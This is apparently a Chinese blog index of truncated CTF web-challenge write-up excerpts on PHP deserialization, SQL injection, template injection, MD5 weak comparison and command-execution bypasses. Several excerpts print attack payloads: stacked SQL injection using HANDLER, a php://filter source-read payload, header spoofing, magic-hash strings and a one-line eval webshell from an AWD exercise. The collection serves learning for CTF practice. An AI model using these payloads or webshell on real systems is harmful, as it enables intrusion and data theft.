qq_42728977的博客

[网鼎杯 2020 朱雀组]phpweb考点复现参考考点反序列化、php审计复现打开，这什么鬼启用checklist，看view source无果，使用burp，发现含有参数，POST /index.php HTTP/1.1Host: a32c0082-7a24-48f0-ac37-ab8fb8cb6c36.node4.buuoj.cn:81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/2010010

[BJDCTF2020]ZJCTF，不过如此考点复现参考考点preg_replace /e 参数执行漏洞、php伪协议、转义绕过复现点开链接<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g

[GXYCTF2019]禁止套娃考点复现法一：单纯构造GET参数法二：构造session组合拳参考考点正则表达、无参数rce、git泄露复现法一：单纯构造GET参数打开就一句然后查看源码，空空如也。想到扫描后台文件，使用御剑很慢，使用dirsearch，一直429，查找资料，加了-s参数，也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e

[BJDCTF2020]The mystery of ip考点复现参考考点模板注入复现看到提示，说是怎么知道我的ip，那就说明应该是该请求头，然后模板注入，然后发现果然是。在请求头加入X-Forwarded-For:GET /flag.php HTTP/1.1Host: node4.buuoj.cn:28006User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0A

[BUUCTF 2018]Online Tool考点escapeshellarg和escapeshellcmd绕过nmap 写入文件复现参考考点escapeshellarg和escapeshellcmd绕过nmap 写入文件复现打开链接<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isse

ElasticSearch 命令执行漏洞 CVE-2014-3120背景知识ElasticSearch是什么？漏洞原理复现传????反弹shell参考背景知识ElasticSearch是什么？ElasticSearch是一个基于Lucene构建的开源，分布式，RESTful搜索引擎。设计用于云计算中，能够达到实时搜索，稳定，可靠，快速，安装使用方便。支持通过HTTP使用JSON进行数据索引。说人话。。。在日常开发中，数据库也能做到（实时、存储、搜索、分析）。相对于数据库，Elasticsearc

[RoarCTF 2019]Easy Java考点复现参考考点java web开发复现点击help发现现在不了，改成post成功然后下载，WEB-INF/web.xml得到<?xml version="1.0" encoding="UTF-8"?><web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

[网鼎杯 2018]Fakebook考点复现法1，load_file()法2，纯sql注入总结参考考点sql注入复现法1，load_file()注册登陆之后http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0可能存在注入点，尝试，发现确实有http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 un

[GYCTF2020]Blacklist考点复现参考考点堆叠注入，mysql handler语法使用复现经测试，为字符型注入。查看表1';show columns from FlagHer;#使用hanlder 查看1';handler FlagHere open;handler FlagHere read first;#参考堆叠注入详解[GYCTF2020]Blacklist堆叠注入【MySQL】MySQL 之 handler 的详细使用及说明...

[网鼎杯 2020 青龙组]AreUSerialz考点复现结论考点php审计，反序列化，弱比较复现<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1";

buu刷题-[ZJCTF 2019]NiZhuanSiWei知识点解题流程思考参考知识点php的to_string魔法函数将类转变为字符串解题流程<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){//伪协议利用，

[BJDCTF2020]Easy MD5知识点==比较法1：法2：===法1：法2：思考参考知识点MD5强弱比较==比较法1：由于md5不能加密数组，在加密数组的时候会返回NULL传入两个数组例：a[]=1&b[]=2法2：可以传入两个md5加密后是0e开头的字符串，需要注意的地方是，这个以0e开头的字符串只能是纯数字，这样php在进行科学计算法的时候才会将它转化为0QNKCDZO0e830400451993494058024219903391 s878926199a0e

DNUICTF-[萌]odd_upload-smarty模板注入知识点复现思考引用知识点smarty模板注入复现看出smarty模板有上传点，但是尝试了很多常规一句话，都不行看了WP，得知是这个模板的一个特殊机制，而且题目提示与官方example一致那就上传templates/index.tpl访问测试给name赋值测试赋值命令测试思考smarty模板前后端分离，后端只需提供固定代号的变量和接口，前端使用这些接口和统一标准的变量名，也就是有一种模板套用的感觉。引用

这里写目录标题知识点ldap简介与ldap注入ldap语法注入复现思考引用知识点ldap注入ldap简介与ldap注入LDAP(Lightweight Directory Access Protocol):轻量级目录访问协议，是一种在线目录访问协议，主要用于目录中资源的搜索和查询，是X.500的一种简便的实现。那么转换成人话就是说，LDAP是用于访问目录服务（特别是基于X.500的目录服务）的轻量级客户端服务器协议，它通过TCP/IP传输服务运行。ldap注入，其实它的攻击手法和SQL注入的原理非

[HCTF 2018]admin考点session伪造流程思考参考考点1、弱口令 2、flask框架 session伪造 3、代码审计 unicode strlower()函数审计session伪造流程change页面的源码，泄露后台源码index源码看得到，要admin登录所以查看后台源码发现需要登录认证和session[‘name’]为admin，那就伪造呗。flask session伪造session漏洞流程：先注册一个用户test/test，并登录拿到session，

目录考点环境思路思考参考考点模板注入环境思路观察get参数，需要文件名和filehash杂谈hint.txt里面发现filehash的函数需要爆出cookie_secret，cookie_secret简单说就是服务端验证用户端cookie安全性的一个值，也就是说不在本地。看WP说这个特征是模板注入。所以思路就是用模板注入获得cookie_secret，根据WP，cookie_secret在当前页面的setting里面，application初始化时存放在该对象的settings属性

https://www.cnblogs.com/kuaile1314/p/11897097.html?file=php://filter/read=convert.base64-encode/resource=xxx.php

http://m.bubuko.com/infodetail-3138873.html插入X-Forwarded-For 127.0.0.1

$num=$_GET['num'];if(!is_numeric($num)){echo $num;if($num==1)echo 'flag{**********}';}"=="绕过php中有两种比较符号=== 会同时比较字符串的值和类型== 会先将字符串换成相同类型，再作比较，属于弱类型比较== 对于所有0e开头的都为相等is_numeric() 判断变量是否为数字或数字字符串is_numeric() 函数会判断如果是数字和数字字符串则返回 TRUE，否则返回 FALSE,且

题目：Xctf PHP2思路：phps源码泄露，url二次解码流程：扫描目录，得到index.phps，这谁想得到，看WP得：phps文件就是php的源代码文件，通常用于提供给用户（访问者）查看php代码，因为用户无法直接通过Web浏览器看到php文件的内容，所以需要用phps文件代替。其实，只要不用php等已经在服> 务器中注册过的MIME类型为文件即可，但为了国际通用，所以才用了...

漏洞点.git泄露、php弱类型漏洞思路题目直接给了后台代码，我分析了半天，想不出来，看了一些大佬的WP。思路就是，用.git漏洞下载源码，再根据后台在传入彩票number时的弱类比较漏洞，利用漏洞，可以买彩票一直中奖，获得flag。解题过程我先用御剑扫了后台发现有.git ，但是没什么用，再用seay扫描漏洞，无。看来只能看源码了。看到这里有flag，而且money从sessio...

Web_php_unserializephp_rceweb_php_include1、漏洞点：php strstr() 绕过，伪协议包含漏洞这个提有很多利用方法。方法一：访问页面看到如下：<?phpshow_source(__FILE__);echo $_GET['hello'];$page=$_GET['page'];while (strstr($page, "php...

寒假在家，老师组织了AWD训练赛，还是实战出真知，感觉比赛的学习效率是真的高。做个小总结。也是刚入门，欢迎大佬斧正。漏洞1：webshell.php第一个漏洞是后门的，是一句话木马。<?php @eval($_POST['moxiaoxi']) ?>很简单，没有什么难度，可以直接菜刀，但是菜刀不能批量自动化获取flag。所以，尝试着写脚本。import requests...

之前做过一次python沙盒逃逸的题，但是当时只是看WP没有仔细地深入，这次仔细的探究一下这个漏洞的原理和防御。在这里只是写一点开端，后续再深入，因为我看资料发现这个漏洞牵扯到的东西挺多的。题目Web_python_template_injection原理python模块注入、python沙河逃逸环境firefox、hackbar流程在题目的URL后面添加如下命令，就可以命令执行了...

这个题目不难，主要是从这个题我学会了反序列化漏洞的基本原理。核心思想就是：当进行反序列化的时候，字符串会被发序列化为对象，而对象中又可能有一些危险函数，以及整个过程中会触发一些魔法函数，进而导致可空字符串变为可执行的代码。还需要练几个类似的题。题目：unserialize3原理：反发序列化漏洞（对象注入）环境：sublime，chmore解题过程：简单访问：可以看到，在xct...

这个题做的还是太明白，看了许多wp。在此小记录一下。题目这个鸭子，看到以为是sql注入，但又看是输入域名，然后返回ping的结果，又像是命令执行漏洞，于是各种姿势试，无果。开始看wp。大佬们是先fuzz一波，发现当url=@的时候报错，而@的的url编码是%80，...

拿到题目，查看源码看到source.php,查看其内容 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page)//创建函数,&是引用，影响原值 { $whitelist = [...